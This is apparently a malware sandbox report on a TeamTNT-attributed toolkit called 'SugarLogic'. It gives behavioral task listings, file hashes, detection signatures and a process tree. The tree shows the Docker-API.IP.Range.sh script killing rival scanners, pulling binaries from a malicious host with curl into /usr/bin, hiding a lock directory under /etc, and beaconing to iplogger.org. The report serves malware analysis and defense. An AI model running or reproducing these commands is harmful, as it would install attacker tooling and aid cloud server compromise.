Overview
overview
10Static
static
10SugarLogic...AWS.sh
ubuntu-18.04-amd64
6SugarLogic...AWS.sh
debian-9-armhf
6SugarLogic...AWS.sh
debian-9-mips
6SugarLogic...AWS.sh
debian-9-mipsel
6SugarLogic...nge.sh
ubuntu-18.04-amd64
6SugarLogic...nge.sh
debian-9-armhf
6SugarLogic...nge.sh
debian-9-mips
6SugarLogic...nge.sh
debian-9-mipsel
6SugarLogic...tup.sh
windows7-x64
3SugarLogic...tup.sh
windows10-2004-x64
3SugarLogic...bot.sh
windows7-x64
3SugarLogic...bot.sh
windows10-2004-x64
3SugarLogic...d_2.sh
ubuntu-18.04-amd64
7SugarLogic...d_2.sh
debian-9-armhf
7SugarLogic...d_2.sh
debian-9-mips
7SugarLogic...d_2.sh
debian-9-mipsel
7SugarLogic...oit.sh
windows7-x64
3SugarLogic...oit.sh
windows10-2004-x64
3SugarLogic...arch64
ubuntu-18.04-amd64
SugarLogic...arch64
debian-9-armhf
SugarLogic...arch64
debian-9-mips
SugarLogic...arch64
debian-9-mipsel
SugarLogic...x86_64
ubuntu-22.04-amd64
10SugarLogic.../bot_u
ubuntu-22.04-amd64
10SugarLogic...en2.sh
ubuntu-18.04-amd64
3SugarLogic...en2.sh
debian-9-armhf
4SugarLogic...en2.sh
debian-9-mips
3SugarLogic...en2.sh
debian-9-mipsel
3SugarLogic...cap.so
ubuntu-22.04-amd64
1SugarLogic.../mo.sh
ubuntu-18.04-amd64
7SugarLogic.../mo.sh
debian-9-armhf
7SugarLogic.../mo.sh
debian-9-mips
10Analysis
-
max time kernel
150s -
max time network
35s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
29-12-2024 23:10
Behavioral task
behavioral1
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh
Resource
ubuntu1804-amd64-20240611-en
ubuntu-18.04-amd64
Behavioral task
behavioral2
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh
Resource
debian9-armhf-20240611-en
debian-9-armhf
Behavioral task
behavioral3
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh
Resource
debian9-mipsbe-20240418-en
debian-9-mips
Behavioral task
behavioral4
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/AWS.sh
Resource
debian9-mipsel-20240729-en
debian-9-mipsel
Behavioral task
behavioral5
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh
Resource
ubuntu1804-amd64-20240611-en
ubuntu-18.04-amd64
Behavioral task
behavioral6
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh
Resource
debian9-armhf-20240729-en
debian-9-armhf
Behavioral task
behavioral7
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh
Resource
debian9-mipsbe-20240611-en
debian-9-mips
Behavioral task
behavioral8
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh
Resource
debian9-mipsel-20240611-en
debian-9-mipsel
Behavioral task
behavioral9
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes.XMR.tmp.Setup.sh
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral10
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes.XMR.tmp.Setup.sh
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral11
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes.put.the.bot.sh
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral12
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes.put.the.bot.sh
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral13
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh
Resource
ubuntu1804-amd64-20240508-en
ubuntu-18.04-amd64
Behavioral task
behavioral14
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh
Resource
debian9-armhf-20240611-en
debian-9-armhf
Behavioral task
behavioral15
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh
Resource
debian9-mipsbe-20240611-en
debian-9-mips
Behavioral task
behavioral16
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh
Resource
debian9-mipsel-20240729-en
debian-9-mipsel
Behavioral task
behavioral17
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/MountSshExploit.sh
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral18
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/MountSshExploit.sh
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral19
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/TNTb/aarch64
Resource
ubuntu1804-amd64-20240508-en
ubuntu-18.04-amd64
Behavioral task
behavioral20
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/TNTb/aarch64
Resource
debian9-armhf-20240611-en
debian-9-armhf
Behavioral task
behavioral21
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/TNTb/aarch64
Resource
debian9-mipsbe-20240611-en
debian-9-mips
Behavioral task
behavioral22
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/TNTb/aarch64
Resource
debian9-mipsel-20240611-en
debian-9-mipsel
Behavioral task
behavioral23
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/TNTb/x86_64
Resource
ubuntu2204-amd64-20240522.1-en
ubuntu-22.04-amd64
Behavioral task
behavioral24
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/bot_u
Resource
ubuntu2204-amd64-20240611-en
ubuntu-22.04-amd64
Behavioral task
behavioral25
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/kuben2.sh
Resource
ubuntu1804-amd64-20240729-en
ubuntu-18.04-amd64
Behavioral task
behavioral26
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/kuben2.sh
Resource
debian9-armhf-20240611-en
debian-9-armhf
Behavioral task
behavioral27
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/kuben2.sh
Resource
debian9-mipsbe-20240611-en
debian-9-mips
Behavioral task
behavioral28
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/kuben2.sh
Resource
debian9-mipsel-20240418-en
debian-9-mipsel
Behavioral task
behavioral29
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/libpcap.so
Resource
ubuntu2204-amd64-20240729-en
ubuntu-22.04-amd64
Behavioral task
behavioral30
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh
Resource
ubuntu1804-amd64-20240611-en
ubuntu-18.04-amd64
Behavioral task
behavioral31
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh
Resource
debian9-armhf-20240611-en
debian-9-armhf
Behavioral task
behavioral32
Sample
SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh
Resource
debian9-mipsbe-20240611-en
debian-9-mips
General
-
Target
SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh
-
Size
21KB
-
MD5
d0295e4ffb268b65f19e7e315f6ec5c6
-
SHA1
0164ad6ed68acd956395202fe8fd6561fe10e62c
-
SHA256
0dab485f5eacbbaa62c2dd5385a67becf2c352f2ebedd2b5184ab4fba89d8f19
-
SHA512
5795640f96e8f5514cce674e46fc2cac5c9d91c53ec7bc45e42ecb315a13851aabd83a9ed11702d7112179ea74f2f6b27febc77204aa6937409e873ec920b33a
-
SSDEEP
192:9Uml6l+q7osa5zmPXArSKUpVkzzfbmpWMzAH53p1RMFKodJZIYIHAFDMXT:mtHssOTmpWCAHvCdYHAFDkT
Malware Config
Signatures
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11 iplogger.org 12 iplogger.org -
Reads CPU attributes 1 TTPs 3 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
description ioc Process File opened for reading /proc/19/cmdline pkill File opened for reading /proc/22/status pkill File opened for reading /proc/727/cmdline pkill File opened for reading /proc/20/cmdline pkill File opened for reading /proc/16/cmdline pkill File opened for reading /proc/5/status pkill File opened for reading /proc/79/cmdline pkill File opened for reading /proc/73/cmdline pkill File opened for reading /proc/9/status pkill File opened for reading /proc/729/status pkill File opened for reading /proc/353/cmdline pkill File opened for reading /proc/729/cmdline pkill File opened for reading /proc/11/status pkill File opened for reading /proc/10/status pkill File opened for reading /proc/322/status pkill File opened for reading /proc/352/cmdline pkill File opened for reading /proc/379/cmdline pkill File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/122/cmdline pkill File opened for reading /proc/4/cmdline pkill File opened for reading /proc/352/status pkill File opened for reading /proc/21/status pkill File opened for reading /proc/18/status pkill File opened for reading /proc/filesystems tar File opened for reading /proc/10/status pkill File opened for reading /proc/70/status pkill File opened for reading /proc/675/status pkill File opened for reading /proc/736/cmdline pkill File opened for reading /proc/4/status pkill File opened for reading /proc/172/cmdline pkill File opened for reading /proc/353/cmdline pkill File opened for reading /proc/379/status pkill File opened for reading /proc/352/cmdline pkill File opened for reading /proc/14/status pkill File opened for reading /proc/704/cmdline pkill File opened for reading /proc/348/cmdline pkill File opened for reading /proc/685/status pkill File opened for reading /proc/22/cmdline pkill File opened for reading /proc/75/status pkill File opened for reading /proc/727/status pkill File opened for reading /proc/729/cmdline pkill File opened for reading /proc/674/cmdline pkill File opened for reading /proc/15/cmdline pkill File opened for reading /proc/675/cmdline pkill File opened for reading /proc/109/cmdline pkill File opened for reading /proc/377/cmdline pkill File opened for reading /proc/1/status pkill File opened for reading /proc/11/cmdline pkill File opened for reading /proc/75/status pkill File opened for reading /proc/15/status pkill File opened for reading /proc/186/status pkill File opened for reading /proc/172/status pkill File opened for reading /proc/318/cmdline pkill File opened for reading /proc/15/status pkill File opened for reading /proc/22/status pkill File opened for reading /proc/172/cmdline pkill File opened for reading /proc/722/cmdline pkill File opened for reading /proc/149/cmdline pkill File opened for reading /proc/671/cmdline pkill File opened for reading /proc/70/cmdline pkill File opened for reading /proc/3/cmdline pkill File opened for reading /proc/21/cmdline pkill File opened for reading /proc/667/status pkill File opened for reading /proc/122/cmdline pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 777 curl 789 curl
Processes
-
/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh"/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh"1⤵PID:729
-
/bin/mkdirmkdir -p /etc/.../.docker-api.ip.range.lock/2⤵PID:731
-
-
/usr/bin/pkillpkill masscan2⤵
- Reads CPU attributes
- Reads runtime system information
PID:734
-
-
/usr/bin/pkillpkill pnscan2⤵
- Reads CPU attributes
- Reads runtime system information
PID:735
-
-
/usr/bin/pkillpkill zgrab2⤵
- Reads CPU attributes
- Reads runtime system information
PID:736
-
-
/usr/bin/curlcurl -sLk http://dl1.chimaera.cc:443/sugarcrm/themes/default/images/SugarLogic/.../jq/x86_64 -o /usr/bin/jq2⤵PID:737
-
-
/usr/bin/curlcurl -sLk http://dl1.chimaera.cc:443/sugarcrm/themes/default/images/SugarLogic/.../masscan/x86_64 -o /usr/bin/masscan2⤵PID:739
-
-
/usr/bin/curlcurl -sLk http://dl1.chimaera.cc:443/sugarcrm/themes/default/images/SugarLogic/.../zgrab/x86_64 -o /usr/bin/zgrab2⤵PID:741
-
-
/usr/bin/curlcurl -sLk http://dl1.chimaera.cc:443/sugarcrm/themes/default/images/SugarLogic/.../pnscan/x86_64 -o /usr/bin/pnscan2⤵
- Reads runtime system information
PID:747
-
-
/usr/bin/curlcurl -sLk http://dl1.chimaera.cc:443/sugarcrm/themes/default/images/SugarLogic/.../docker/x86_64.tgz -o /dev/shm/docker.tgz2⤵PID:753
-
-
/bin/tartar xzvf /dev/shm/docker.tgz -C /dev/shm/2⤵
- Reads runtime system information
PID:761
-
-
/bin/mvmv "/dev/shm/docker/*" /usr/bin/2⤵PID:763
-
-
/bin/rmrm -fr /dev/shm/docker/2⤵PID:765
-
-
/bin/unameuname -m2⤵PID:767
-
-
/bin/unameuname -m2⤵PID:768
-
-
/bin/unameuname -m2⤵PID:769
-
-
/bin/unameuname -m2⤵PID:771
-
-
/bin/unameuname -m2⤵PID:773
-
-
/bin/unameuname -m2⤵PID:774
-
-
/bin/unameuname -m2⤵PID:775
-
-
/usr/bin/curlcurl -sLk https://iplogger.org/1A4Cu7 -o /dev/null2⤵
- System Network Configuration Discovery
PID:777
-
-
/usr/bin/curlcurl -sLk ipv4.icanhazip.com2⤵
- System Network Configuration Discovery
PID:789
-